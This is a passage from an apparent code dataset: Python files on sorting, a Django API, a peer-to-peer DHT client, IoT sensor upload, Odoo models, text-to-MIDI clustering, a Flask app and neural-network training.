QuickSort(Arr[0:i], p, i-1)\n ExecTime.append(time.time() - StartTime)\n return ExecTime\n\n\ndef Graph(InputSize, ExecTime):\n plt.plot(InputSize, ExecTime)\n plt.ylabel('Runtime (s)')\n plt.xlabel('Input Size (logn)')\n plt.title('Algorithm RunTime of QUICK SORT as a Function of Input Size')\n plt.show()\n\n\np = 0\nr = len(Arr) - 1\n\nif Submission: # 
Submission flag\n print(f'Running QuickSort on Input Size of {len(Arr)}')\n StartTime = time.time()\n\n QuickSort(Arr, p, r)\n\n Total = time.time() - StartTime\n # Print the sorted array\n for i in Arr:\n Data[i].insert(0, i)\n print(Data[i])\n # Print the status of the dataset\n SortStatus = all(Arr[i] <= Arr[i+1]\n for i in range(len(Arr)-1)) # Check if Sorted\n print(f'Is the Dataset Sorted: {SortStatus}')\n print(Total)\nelse:\n print(f'Running QuickSort on Input Size of {len(Arr)}')\n InputSize = DetermineInputSizeList(Arr)\n ExecTime = TimeAlgorithm(Arr, InputSize, p, r)\n Graph(InputSize, ExecTime)\n","sub_path":"A1/QuickSortOpt.py","file_name":"QuickSortOpt.py","file_ext":"py","file_size_in_byte":2479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"163093753","text":"import os\n\nimport numpy as np\nfrom PIL import Image\n\n# NOTE: IMAGE_WIDTH, DROPOUT_CHANNELS and save_image() are assumed to be\n# defined elsewhere in the surrounding project\n\ndef html_to_int(code):\n # convert an '#RRGGBB' HTML colour code to a packed RGBA integer with full alpha\n return int(\"0x\"+code[1::],16)*256+255\n\ndef save_mask(mask,fname):\n colors = [\n \"#2E2EFE\",\n \"#00FF00\",\n \"#FF0040\",\n \"#610B0B\",\n \"#FF0040\",\n \"#00FFFF\",\n \"#FFFF00\",\n \"#848484\",\n \"#000000\",\n ]\n color_ints = [html_to_int(col) for col in colors]\n resarray = np.zeros((IMAGE_WIDTH,IMAGE_WIDTH),dtype=np.int32)\n for x in range(IMAGE_WIDTH):\n for y in range(IMAGE_WIDTH):\n sum = 0\n iters = 0\n for z in range(DROPOUT_CHANNELS):\n if mask[x][y][z] != 0:\n sum += color_ints[z]\n iters += 1\n resarray[x][y] += sum // iters if iters != 0 else 0xffffffff\n\n casted_image = np.frombuffer(resarray.tobytes(), dtype=np.uint8).reshape((IMAGE_WIDTH,IMAGE_WIDTH,4))\n Image.fromarray(casted_image,mode=\"RGBA\").save(fname)\n\n\n\ndef save_generated_image(orig_img,generated_image,generated_mask,revealed_capsules,weight_updates):\n folder = \"generated/{}/\".format(str(weight_updates))\n NUM_IMAGES_SAVE = 5\n if not os.path.exists(folder):\n for i in range(NUM_IMAGES_SAVE):\n subfold = folder+str(i)+\"/\"\n fname = subfold+\"orig.png\"\n os.makedirs(subfold)\n save_image(orig_img[i].reshape((IMAGE_WIDTH,IMAGE_WIDTH)),fname)\n for i in range(NUM_IMAGES_SAVE):\n fname = \"{}{}/{}.png\".format(folder,i,revealed_capsules)\n maskfname = \"{}{}/{}m.png\".format(folder,i,revealed_capsules)\n save_image(generated_image[i].reshape((IMAGE_WIDTH,IMAGE_WIDTH)),fname)\n save_mask(generated_mask[i],maskfname)\n","sub_path":"save_image.py","file_name":"save_image.py","file_ext":"py","file_size_in_byte":1661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"56636382","text":"from django.http import JsonResponse\nfrom ...models import ProProject, HisHistory, MemMember\nfrom ...permission import Permission\nfrom .ApiResponse import ApiResponse\nfrom .Global import Global\n\n\nclass ProjectsMembersId(Global):\n\n def get(self, request, id, userid):\n\n pro = ProProject.objects.get(id=id)\n\n # Check that the user has read permission on the project\n if pro.getPermission(self.User) < Permission.View:\n return ApiResponse.Generate401()\n\n mem = MemMember.objects.get(pro_project_id=id, usr_user_id=userid)\n response = mem.usr_user.to_dict()\n\n return JsonResponse(response)\n\n def delete(self, request, id, userid):\n\n pro = ProProject.objects.get(id=id)\n mem = MemMember.objects.get(pro_project_id=id, usr_user_id=userid)\n\n # A member can only remove themselves from a project, unless they are\n # the owner\n if ((self.User is None or\n pro.getPermission(self.User) <= Permission.Edit) and\n self.User.id != userid):\n return ApiResponse.Generate401()\n\n HisHistory.log(\"DELETE\", mem, 
self.User)\n mem.delete()\n\n return ApiResponse.Generate204()\n","sub_path":"Focus/api/v1/ProjectsMembersId.py","file_name":"ProjectsMembersId.py","file_ext":"py","file_size_in_byte":1203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"98169955","text":"# COMP3331 Assignment\n# Written by William Coulter z5113817\nimport sys\nimport threading\nimport time\n\nfrom threads.TCPServer import TCPserver\nfrom threads.UDPServer import UDPserver\nfrom threads.PingRequest import pingRequest\nfrom threads.FileRequest import fileRequest\nfrom threads.NewSuccessor import newSuccessor\nfrom threads.NewPredecessor import newPredecessor\nfrom threads.Ping import ping\n\nfrom supporting.Functions import hash, has_file\n\n# add all inputs from cmd line\npeer_id = int(sys.argv[1])\nsuccessors = [int(sys.argv[2]), int(sys.argv[3])]\npredecessors = ['2', 'elements'] \nMSS = int(sys.argv[4])\ndrop_prob = float(sys.argv[5])\n\n# run server for rest of execution\nTCPServerThread = TCPserver(peer_id, successors, predecessors, MSS, drop_prob)\nUDPServerThread = UDPserver(peer_id, successors, predecessors)\nTCPServerThread.start()\nUDPServerThread.start()\ntime.sleep(0.5)\n\n# peers ping each other throughout execution to test if alive\npingThread = ping(peer_id, successors)\npingThread.start()\ntime.sleep(0.5)\n\n# this is where cmd line input is handled\nwhile True:\n initial_input = input()\n command = initial_input.split()[0]\n \n # if request input\n if command == \"request\":\n file_no = hash(initial_input.split()[1])\n if file_no == None:\n print('Please input a valid filename between 0000 and 9999')\n continue\n\n # send request to successor\n fileRequestThread = fileRequest(peer_id, successors[0], peer_id, file_no) \n fileRequestThread.start()\n fileRequestThread.join() \n\n # if peer departure input\n elif command == \"quit\":\n print(f'Peer {peer_id} will depart from the network')\n \n # send messages to assign new predecessors and successors\n newSuccessorImmediateThread = newSuccessor(predecessors[0], [successors[0], successors[1]])\n newSuccessorThread = newSuccessor(predecessors[1], [predecessors[0], successors[0]])\n newPredecessorImmediateThread = newPredecessor(successors[0], [predecessors[0], predecessors[1]])\n newPredecessorThread = newPredecessor(successors[1], [successors[0], predecessors[0]])\n \n newSuccessorImmediateThread.start()\n newSuccessorThread.start()\n newPredecessorImmediateThread.start()\n newPredecessorThread.start()\n \n newSuccessorImmediateThread.join()\n newSuccessorThread.join()\n newPredecessorImmediateThread.join()\n newPredecessorThread.join()\n time.sleep(0.2)\n\n # not sure how to exit terminal\n sys.exit()\n else:\n print('invalid input')\n continue \n\npingThread.join()\nTCPServerThread.join()\nUDPServerThread.join()","sub_path":"cdht.py","file_name":"cdht.py","file_ext":"py","file_size_in_byte":2744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"578999143","text":"\"\"\"\nBubble sort.\nhttps://en.wikipedia.org/wiki/Bubble_sort\n\nWorst case time complexity: O(n^2)\nBest case time complexity: O(n)\n\n@author Juhan Bae\n@date 5/22/2018\n\"\"\"\nfrom Sorting.Sort import Sort\n\n\nclass BubbleSort(Sort):\n def __init__(self, lst):\n \"\"\" Initialize a class BubbleSort.\n :param lst: List[Object]\n \"\"\"\n Sort.__init__(self, lst)\n\n def sort(self):\n \"\"\" Return a sorted lst.\n :return: List[Object]\n\n >>> lst = BubbleSort([5, 4, 5, 1, 7, 4])\n >>> 
lst.sort()\n [1, 4, 4, 5, 5, 7]\n \"\"\"\n i = len(self.lst) - 1\n while i > 0:\n for j in range(0, i):\n if self.lst[j] > self.lst[j + 1]:\n # Incorrect sort spot. swap it.\n self.lst[j], self.lst[j + 1] = self.lst[j + 1], self.lst[j]\n # Index that is completely sorted.\n i = i - 1\n return self.lst\n\n\nif __name__ == \"__main__\":\n import doctest\n doctest.testmod()\n","sub_path":"Sorting/BubbleSort.py","file_name":"BubbleSort.py","file_ext":"py","file_size_in_byte":998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"192525958","text":"from django.shortcuts import render, redirect\nfrom django.http import HttpResponse\nfrom django.template.loader import get_template \nfrom django.template import Context\nimport pdfkit\nimport os\nfrom .models import Customers\nfrom django.contrib.auth.decorators import login_required\nfrom django import forms\n\nfrom django.contrib import auth\nfrom .forms import CustomerForm\n\n@login_required(login_url='/accounts/login')\ndef home(request):\n\n return render(request, 'bills/customer_data.html')\n\n\n\n@login_required(login_url='/accounts/login')\ndef order(request):\n \n if request.method == \"POST\":\n form=CustomerForm(request.POST)\n if form.is_valid():\n # running code that converts html to pdf using the data passed in the form\n config = pdfkit.configuration(wkhtmltopdf=\"C:\\\\Program Files\\\\wkhtmltopdf\\\\bin\\\\wkhtmltopdf.exe\")\n template = get_template(\"bills/order.html\")\n \n \n context = {\n 'first_name': request.POST.get('first_name'),\n 'last_name': request.POST.get('last_name'),\n 'email': request.POST.get('email'),\n 'phone': request.POST.get('phone'),\n 'street': request.POST.get('street'),\n 'city': request.POST.get('city'),\n 'post_code': request.POST.get('post_code'),\n 'county': request.POST.get('county'),\n 'number_of_products':request.POST.get('number_of_products'),\n 'price_of_product':request.POST.get('price_of_product')\n \n }\n \n html = template.render(context)\n pdfkit.from_string(html, 'out.pdf', configuration=config)\n pdf = open(\"out.pdf\",\"rb\")\n response = HttpResponse(pdf.read(), content_type='application/pdf')\n response['Content-Disposition'] = 'inline; filename=output.pdf'\n pdf.close()\n os.remove(\"out.pdf\")\n # saving the input to database and returning the converted page\n customer_data = Customers(first_name= context['first_name'],last_name=context['last_name'],email=context['email'],phone=context['phone'],street=context['street'],city=context['city'],post_code=context['post_code'],county=context['county'],number_of_products=context['number_of_products'],price_of_product=context['price_of_product']) \n customer_data.save()\n return response\n else:\n form=CustomerForm() \n else:\n form = CustomerForm()\n\n return render(request, 'bills/order.html',{'form':form})\n\n \n","sub_path":"billing/billing/bills/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"644858285","text":"# rectangle_practice.py\n# apply objects/classes\n\nimport pygame\n\n# ----- CONSTANTS\nBLACK = (0, 0, 0)\nWHITE = (255, 255, 255)\nYELLOW = (255, 255, 0)\nSKY_BLUE = (95, 165, 228)\nWIDTH = 800\nHEIGHT = 600\nTITLE = \"Rectangle Practice\"\n\n\nclass Rectangle():\n def __init__(self):\n self.x = 0\n self.y = 0\n\n self.width = 10\n self.height = 10\n\n self.colour = (0, 255, 0)\n\ndef main():\n pygame.init()\n\n # ----- SCREEN PROPERTIES\n size = 
(WIDTH, HEIGHT)\n screen = pygame.display.set_mode(size)\n pygame.display.set_caption(TITLE)\n\n # ----- LOCAL VARIABLES\n done = False\n clock = pygame.time.Clock()\n\n rectangle = Rectangle()\n rectangle_two = Rectangle()\n rectangle_two.width, rectangle_two.height = (150, 200)\n rectangle_two.x, rectangle_two.y = (50, 10)\n rectangle_two.colour = WHITE\n\n # ----- MAIN LOOP\n while not done:\n # -- Event Handler\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n done = True\n\n # ----- LOGIC\n\n # ----- DRAW\n screen.fill(BLACK)\n pygame.draw.rect(screen, rectangle.colour, (rectangle.x, rectangle.y, rectangle.width, rectangle.height))\n pygame.draw.rect(screen, rectangle_two.colour, (rectangle_two.x, rectangle_two.y, rectangle_two.width, rectangle_two.height))\n pygame.draw.circle(screen, (0, 255, 0), (100, 100), 50)\n\n # ----- UPDATE\n pygame.display.flip()\n clock.tick(60)\n\n pygame.quit()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"pygame/rectanglePractise.py","file_name":"rectanglePractise.py","file_ext":"py","file_size_in_byte":1545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"215671602","text":"class Solution:\n def convertBST(self, root: TreeNode) -> TreeNode:\n def helper1(root, s):\n if not root: return\n helper1(root.left, s)\n s.append(root.val)\n helper1(root.right, s)\n \n def helper2(root, s):\n if not root: return\n helper2(root.left, s)\n root.val = s.pop()\n helper2(root.right, s)\n\n s1, s2 = [], []\n helper1(root, s1)\n\n while s1:\n if not s2:\n s2.append(s1.pop())\n else:\n s2.append(s2[-1] + s1.pop())\n \n helper2(root, s2)\n return root","sub_path":"Tree/convert_bst_to_greater_tree.py","file_name":"convert_bst_to_greater_tree.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"117422830","text":"\"\"\"\n\nDeviceHUB.net sample code for sending a string, an analog sensor and a digital sensor.\n\nIn this example the string and the sensors are random simulated.\n\nFirst install Python API wrapper for devicehub \nhttps://github.com/devicehubnet/devicehub_py\n\ncreated 30 June 2015\nby Mihnea Moldovan\n\n\"\"\"\n\n\nfrom devicehub.devicehub import Sensor, Actuator, Device, Project\nfrom random import randint\nfrom time import sleep\n\n\nPROJECT_ID = 'paste_your_PROJECT_ID_here'\nDEVICE_UUID = 'paste_your_DEVICE_UUID_here'\nAPI_KEY = 'paste_your_API_KEY_here'\nAN_SENSOR_NAME = 'paste_your_analog_SENSOR_NAME_here'\nDI_SENSOR_NAME = 'paste_your_digital_SENSOR_NAME_here'\nSTRING_NAME = 'paste_your_STRING_NAME_here'\n\n#string simulation\ndata = \"StringTest\"\n\nproject = Project(PROJECT_ID, persistent = True)\ndevice = Device(project, DEVICE_UUID, API_KEY)\n\nDI_SENSOR = Sensor(Sensor.DIGITAL, DI_SENSOR_NAME)\nAN_SENSOR = Sensor(Sensor.ANALOG, AN_SENSOR_NAME)\nSTR = Sensor(Sensor.STRING, STRING_NAME)\n\ndevice.addSensor(DI_SENSOR)\ndevice.addSensor(AN_SENSOR)\ndevice.addSensor(STR)\n\n\nwhile True:\n DI_SENSOR.addValue(randint(0, 1))\n sleep(0.5)\n AN_SENSOR.addValue(randint(1, 100))\n sleep(0.5)\n STR.addValue(data)\n device.send()\n sleep(1)","sub_path":"mqtt/python/send_string_analog_digital_sensors.py","file_name":"send_string_analog_digital_sensors.py","file_ext":"py","file_size_in_byte":1227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"65800267","text":"# -*- coding: utf-8 -*-\n\nfrom openerp import models, fields, 
api\n\n\n# Partner categories\nclass of_partner_categ(models.Model):\n    \n    _name = \"of.partner.categ\"\n    \n    name = fields.Char(u'Catégorie', size=32)\n    parent_id = fields.Many2one('of.partner.categ', 'Catégorie parente', select=True, ondelete='restrict')\n    \n    _constraints = [\n        (models.Model._check_recursion, 'Error ! You can not create recursive category.', ['parent_id'])\n    ]\n\n    # To display the category hierarchy\n    @api.multi\n    def name_get(self):\n        if not self._ids:\n            return []\n        res = []\n        for record in self:\n            name = [record.name]\n            parent = record.parent_id\n            while parent:\n                name.append(parent.name)\n                parent = parent.parent_id\n            name = ' / '.join(name[::-1])\n            res.append((record.id, name))\n        return res\n\n\n\nclass res_partner(models.Model):\n    \n    _inherit = 'res.partner'\n    \n    of_categ_id = fields.Many2one('of.partner.categ', u'Catégorie', required=False, ondelete='restrict')","sub_path":"of_partner_categ/of_partner_categ.py","file_name":"of_partner_categ.py","file_ext":"py","file_size_in_byte":1114,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"320883434","text":"import numpy as np\nimport pandas as pd\nfrom mpl_toolkits.mplot3d import Axes3D\nimport matplotlib.pyplot as plt\nfrom sklearn.cluster import KMeans\nfrom midiutil import MIDIFile\n\nclass Genre:\n    \"\"\"Class to define chords and write to output .mid file\"\"\"\n    # Major chords\n    a_flat = [56, 60, 63]\n    b_flat = []\n    c_maj = [48, 52, 55]\n    f_maj = [53, 57, 60]\n    g_maj = [55, 59, 62]\n\n    # Minor chords\n    a_min = [57, 60, 64]\n    b_flat_min = [58, 62, 65]\n    c_min = [48, 51, 55]\n    d_min = [50, 53, 56]\n    e_min = [52, 55, 59]\n    f_min = [53, 56, 60]\n    g_min = [55, 58, 62]\n\n    # 2-5-1 Jazz chord progression\n    d_maj7 = [50, 53, 57, 48]\n    g_maj7 = [55, 59, 50, 53]\n    c_maj7 = [48, 52, 55, 59]\n\n    #chords to be used in the output\n    chord_prog_pop = [c_maj, a_min, f_maj, g_maj, d_maj7, g_maj7, c_maj7]\n\n    track = 0\n    channel = 7\n    time = 0 # In beats\n    duration = 1 # In beats\n    tempo = 120 # In BPM\n    volume = 100 # 0-127, as per the MIDI standard\n\n    def make_midi(self, chordprog, durations):\n        \"\"\"method to write to output file\"\"\"\n        midi = MIDIFile(1)\n        midi.addTempo(self.track, self.time, self.tempo)\n\n        time = 0\n        for i, chord in enumerate(chordprog):\n            d = durations[i]\n            for j, pitch in enumerate(chord):\n                midi.addNote(self.track, self.channel, pitch, time, d, self.volume)\n            time += d\n\n        # Writes .midi file\n        with open(\"od.mid\", \"wb\") as output_file:\n            midi.writeFile(output_file)\n\nsentences = []\n\nvowels = ['a','e','i','o','u','y']\n\n#read in large text file, sanitize input\nwith open(\"dec.txt\", \"r\", encoding='utf-8') as f:\n    content = f.read()\n    sentences = [x.strip() for x in content.replace('\\n',' ').replace(';','.').replace(':','.').replace('_','').replace('\"','.').replace('“','.').replace('”','.').split('.') if len(x.strip().split()) > 5]\n    print(content.replace('\\n',' ').replace(';','.').replace(':','.').replace('_','').replace('\"','.').replace('“','.').replace('”','.'))\n\n#method to estimate the number of syllables in a word (accurate to +/- 1 syllable)\ndef est_syl(word):\n    if len(word) == 1:\n        return 1\n    word = word.lower()\n    count = 0\n    for i in range(len(word) - 1):\n        if word[i] in vowels and (word[i+1] not in vowels or i == len(word)-2):\n            count += 1\n    return count\n\n#analyzes the three datapoints of a sentence: len, avg word len, num syllables\ndef mk_datapoint(sentence):\n    sentence = sentence.split()\n    words = 
len(sentence)\n syls = sum([est_syl(word) for word in sentence])\n avg = np.mean(list(map(lambda x: len(x), sentence)))\n return [words,avg,syls]\n\n#colormap function for plotting\ndef get_cmap(n, name='hsv'):\n return plt.cm.get_cmap(name, n)\n\n#display a nice looking plot of all the clusters\ndef show_plot(nclusters, df):\n\n kmeans = KMeans(n_clusters=nclusters)\n kmeans.fit(df)\n\n labels = kmeans.predict(df)\n\n centroids = kmeans.cluster_centers_\n cmap = get_cmap(nclusters)\n colmap = {\n i: cmap(i)\n for i in range(nclusters)\n }\n\n fig = plt.figure()\n colors = list(map(lambda x: colmap[x], labels))\n\n ax = fig.add_subplot(111, projection='3d')\n ax.scatter(df[0], df[1], df[2], color=colors, alpha=0.5, edgecolor='k')\n\n for idx, centroid in enumerate(centroids):\n ax.scatter(*centroid, color=colmap[idx])\n\n ax.set_xlabel('Num_Words')\n ax.set_ylabel('Avg_L')\n ax.set_zlabel('Num_Syl')\n\n plt.show()\n\n return df\n\n#k-means clustering\ndef kcluster(nclusters, df):\n\n kmeans = KMeans(n_clusters=nclusters)\n kmeans.fit(df)\n\n labels = kmeans.predict(df)\n\n centroids = kmeans.cluster_centers_\n\n return list(labels)\n\ncs = Genre.chord_prog_pop\n\ndpoints = list(map(lambda x: mk_datapoint(x), sentences))\ndf = pd.DataFrame(data=np.array(dpoints))\n\nshow_plot(len(cs), df)\n\nchords = kcluster(len(cs), df)\n\nd = {\n i: 0\n for i in range(len(cs))\n}\n#print(np.max(dpoints[0]))\ndurations = [dp for dp in df[0]]\n#durations = list(map(lambda x: map_length(x), df[0]))\n\nmin_d = np.min(durations)\nmax_d = np.max(durations)\n\n#choose duration of each chord as a function of sentence length\ndurations = [round(4 * (d - min_d)/(max_d - min_d))/4 * 7 + 0.5 for d in durations]\nprint(durations)\nfor c in chords:\n d[c] += 1\n\n#song = np.random.choice(list(d.keys()), 300, p=[x / len(sentences) for x in list(d.values())])\nl = list(range(len(chords)))\nplt.scatter(l,chords)\nplt.plot(l, chords)\nplt.show()\n\nchord_prog = [cs[i] for i in chords]\ng = Genre()\n\n#create the output music file\ng.make_midi(chord_prog, durations)\n","sub_path":"ttm.py","file_name":"ttm.py","file_ext":"py","file_size_in_byte":4625,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"37967695","text":"#!/usr/bin/python3\n\"\"\"\nReturns the status of the API\n\"\"\"\n\nfrom models import storage\nfrom api.v1.views import app_views\nfrom flask import Flask, jsonify, make_response\nfrom flask_cors import CORS\nfrom os import getenv\n\nHOST = getenv('HBNB_API_HOST', \"0.0.0.0\")\nPORT = getenv('HBNB_API_PORT', 5000)\n\n# enable CORS for app_views blueprint\ncors = CORS(app_views, resources={r\"/*\": {\"origins\": HOST}})\n\napp = Flask(__name__)\napp.url_map.strict_slashes = False\napp.config['JSONIFY_PRETTYPRINT_REGULAR'] = True\n# registers the blueprint app_views to your Flask instance app\napp.register_blueprint(app_views)\n\n\n@app.errorhandler(404)\ndef error_404(err):\n \"\"\"Produce a 404 error message\"\"\"\n return make_response(jsonify(error=\"Not found\"), 404)\n\n\n@app.teardown_appcontext\ndef close_storage(exe):\n \"\"\"closes storage\"\"\"\n storage.close()\n\n\nif __name__ == \"__main__\":\n app.run(host=HOST, port=PORT, threaded=True)\n","sub_path":"api/v1/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"126889802","text":"import os\nimport os.path as osp\nimport logging\nimport gc\nimport numpy as np\n\nimport 
torch\nimport torch.optim as optim\nimport torch.nn as nn\nimport MinkowskiEngine as ME\n\nfrom model_colorization import load_model\nfrom lib.timer import Timer, AverageMeter\n\ndef colorfulness_metric(points):\n    \"\"\"\n    :param points: (N, 3) array of per-point RGB values\n    :return: metric of point cloud colors\n    \"\"\"\n    assert points.shape[1] == 3, 'wrong pcd shape'\n    rg = np.abs(points[:, 0] - points[:, 1])\n    yb = np.abs(0.5*(points[:, 0] + points[:, 1]) - points[:, 2])\n\n    rgMean, rgStd = np.mean(rg), np.std(rg)\n    ybMean, ybStd = np.mean(yb), np.std(yb)\n\n    stdRoot = np.sqrt((rgStd ** 2) + (ybStd ** 2))\n    meanRoot = np.sqrt((rgMean ** 2) + (ybMean ** 2))\n\n    return stdRoot + (0.3 * meanRoot)\n\nclass STrainer:\n    def __init__(\n            self,\n            config,\n            data_loader=None):\n        num_feats = 36\n\n        # Model initialization\n        Model = load_model(config.model)\n        model = Model(\n            num_feats,\n            config.model_n_out,\n            bn_momentum=config.bn_momentum,\n            normalize_feature=config.normalize_feature,\n            conv1_kernel_size=config.conv1_kernel_size,\n            D=3)\n        # load pretrained model weights\n        if config.weights:\n            checkpoint = torch.load(config.weights)\n            model.load_state_dict(checkpoint['state_dict'])\n\n        # set default hyper parameters\n        self.config = config\n        self.model = model\n        self.max_epoch = config.max_epoch\n        self.save_freq = config.save_freq_epoch\n\n        if config.use_gpu and not torch.cuda.is_available():\n            logging.warning('Warning: There\\'s no CUDA support on this machine, '\n                            'training is performed on CPU.')\n            raise ValueError('GPU not available, but cuda flag set')\n\n        self.device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\n        self.optimizer = getattr(optim, config.optimizer)(\n            model.parameters(),\n            lr=config.lr)\n\n        self.start_epoch = 1\n        self.checkpoint_dir = config.out_dir\n        self.iter_size = config.iter_size\n        self.batch_size = data_loader.batch_size\n        self.data_loader = data_loader\n\n        #ensure_dir(self.checkpoint_dir)\n        self.model = self.model.to(self.device)\n        if config.resume is not None:\n            if osp.isfile(config.resume):\n                logging.info(\"=> loading checkpoint '{}'\".format(config.resume))\n                state = torch.load(config.resume)\n                self.start_epoch = state['epoch']\n                model.load_state_dict(state['state_dict'])\n                self.optimizer.load_state_dict(state['optimizer'])\n\n            else:\n                raise ValueError(f\"=> no checkpoint found at '{config.resume}'\")\n\n    def train(self):\n        for epoch in range(self.start_epoch, self.max_epoch + 1):\n            lr = self.config.lr\n            #logging.info(f\" Epoch: {epoch}, LR: {lr}\")\n            self._train_epoch(epoch)\n            self._save_checkpoint(epoch)\n\n    def _train_epoch(self, epoch):\n        gc.collect()\n        self.model.train()\n        # Epoch starts from 1\n        total_loss = 0\n        total_num = 0.0\n\n        data_loader = self.data_loader\n        data_loader_iter = self.data_loader.__iter__()\n\n        iter_size = self.iter_size\n        #start_iter = (epoch - 1) * (len(data_loader) // iter_size)\n        #criterion = nn.MSELoss(reduction='mean')\n        criterion = nn.SmoothL1Loss()\n        #criterion = nn.CrossEntropyLoss(ignore_index=-1)\n        data_meter, data_timer, total_timer = AverageMeter(), Timer(), Timer()\n        # Training steps\n        for curr_iter in range(len(data_loader) // iter_size): #0-5\n            #print(\"#########################\")\n            self.optimizer.zero_grad()\n            batch_loss = 0\n            # records data loading time\n            data_time = 0\n            total_timer.tic()\n            for iter_idx in range(iter_size): #1\n                data_timer.tic()\n                input_dict = data_loader_iter.next()\n                data_time += data_timer.toc(average=False)\n\n                # extract feature from network\n                sinput = 
ME.SparseTensor(input_dict['sinput_F'],coords=input_dict['sinput_C']).to(self.device)\n F0 = self.model(sinput).F\n #loss = criterion(F0, input_dict['rgb'].cuda())\n loss1 = criterion(F0[:, 0:3], input_dict['rgb'].cuda())\n loss2 = criterion(F0[:, 3:6], input_dict['rgb'].cuda())\n loss3 = criterion(F0[:, 6:9], input_dict['rgb'].cuda())\n temp = torch.min(loss1, loss2)\n loss = torch.min(temp, loss3) + 0.6 * loss1 + 0.3 * loss2 + 0.15 * loss3\n #loss2 = colorfulness_metric(F0.cpu().detach().numpy())\n loss /= iter_size\n loss.backward()\n batch_loss += loss.item()\n\n self.optimizer.step()\n gc.collect()\n torch.cuda.empty_cache()\n\n total_loss += batch_loss\n total_num += 1.0\n total_timer.toc()\n data_meter.update(data_time)\n\n if curr_iter % self.config.stat_freq == 0:\n #self.writer.add_scalar('train/loss', batch_loss, start_iter + curr_iter)\n print(\"Train Epoch: {} [{}/{}], Current Loss: {:.3e}\".format(epoch, curr_iter, len(self.data_loader) //\n iter_size, batch_loss) + \"\\tData time: {:.4f}, Train time: {:.4f}, Iter time: {:.4f}\".format(\n data_meter.avg, total_timer.avg - data_meter.avg, total_timer.avg))\n data_meter.reset()\n total_timer.reset()\n\n\n def _save_checkpoint(self, epoch, filename='checkpoint'):\n if epoch % self.save_freq == 0:\n state = {\n 'epoch': epoch,\n 'state_dict': self.model.state_dict(),\n 'optimizer': self.optimizer.state_dict(),\n 'config': self.config,\n }\n filename = str(epoch) + '_checkpoint'\n filename = os.path.join(self.checkpoint_dir, f'{filename}.pth')\n logging.info(\"Saving checkpoint: {} ...\".format(filename))\n torch.save(state, filename)\n\n\n","sub_path":"lib/trainer_scannet_2.py","file_name":"trainer_scannet_2.py","file_ext":"py","file_size_in_byte":6331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"503066771","text":"import io\nimport time\nimport cv2\nimport numpy as np\nimport tensorflow as tf\nimport moviepy.editor as mpy\n\ndef make_gif(images, fname, fps=5):\n duration = len(images)/fps\n def make_frame(t):\n return images[int(len(images)/duration*t)]\n clip = mpy.VideoClip(make_frame, duration=duration)\n clip.write_gif(fname, fps=fps)\n\n# network with pooling\nclass network05():\n def __init__(self, myScope, filters=12, learning_rate=0.0001):\n self.pool_kernel_size = (1,6,6,1)\n self.learning_rate = learning_rate\n self.input = tf.placeholder(shape=[None,136,136,3],\n dtype=tf.float32)\n self.conv1_weights = tf.get_variable(name=myScope+\"_conv1_weights\",\n shape=[6,6,3,filters])\n self.conv1_raw = tf.nn.conv2d(input=self.input,\n filter=self.conv1_weights,\n strides=[1,1,1,1], # strides are [batch, height, width, channels]\n padding=\"SAME\",\n name=myScope+\"_conv1\")\n self.conv1_bias = tf.constant(0.1, shape=[filters])\n self.conv1_activated = tf.nn.relu(tf.nn.bias_add(value=self.conv1_raw,\n bias=self.conv1_bias))\n self.conv1 = tf.nn.max_pool(value=self.conv1_activated,\n ksize=self.pool_kernel_size,\n strides=(1,1,1,1),\n padding=\"SAME\")\n\n self.conv2_weights = tf.get_variable(name=myScope+\"_conv2_weights\",\n shape=[6,6,filters,filters])\n self.conv2_bias = tf.constant(1., shape=[filters])\n self.conv2_raw = tf.nn.conv2d(input=self.conv1,\n filter=self.conv2_weights,\n strides=[1,1,1,1], # strides are [batch, height, width, channels]\n padding=\"SAME\",\n name=myScope+\"_conv2\")\n self.conv2_activated = tf.nn.relu(tf.nn.bias_add(value=self.conv2_raw,\n bias=self.conv2_bias))\n self.conv2 = tf.nn.max_pool(value=self.conv2_activated,\n 
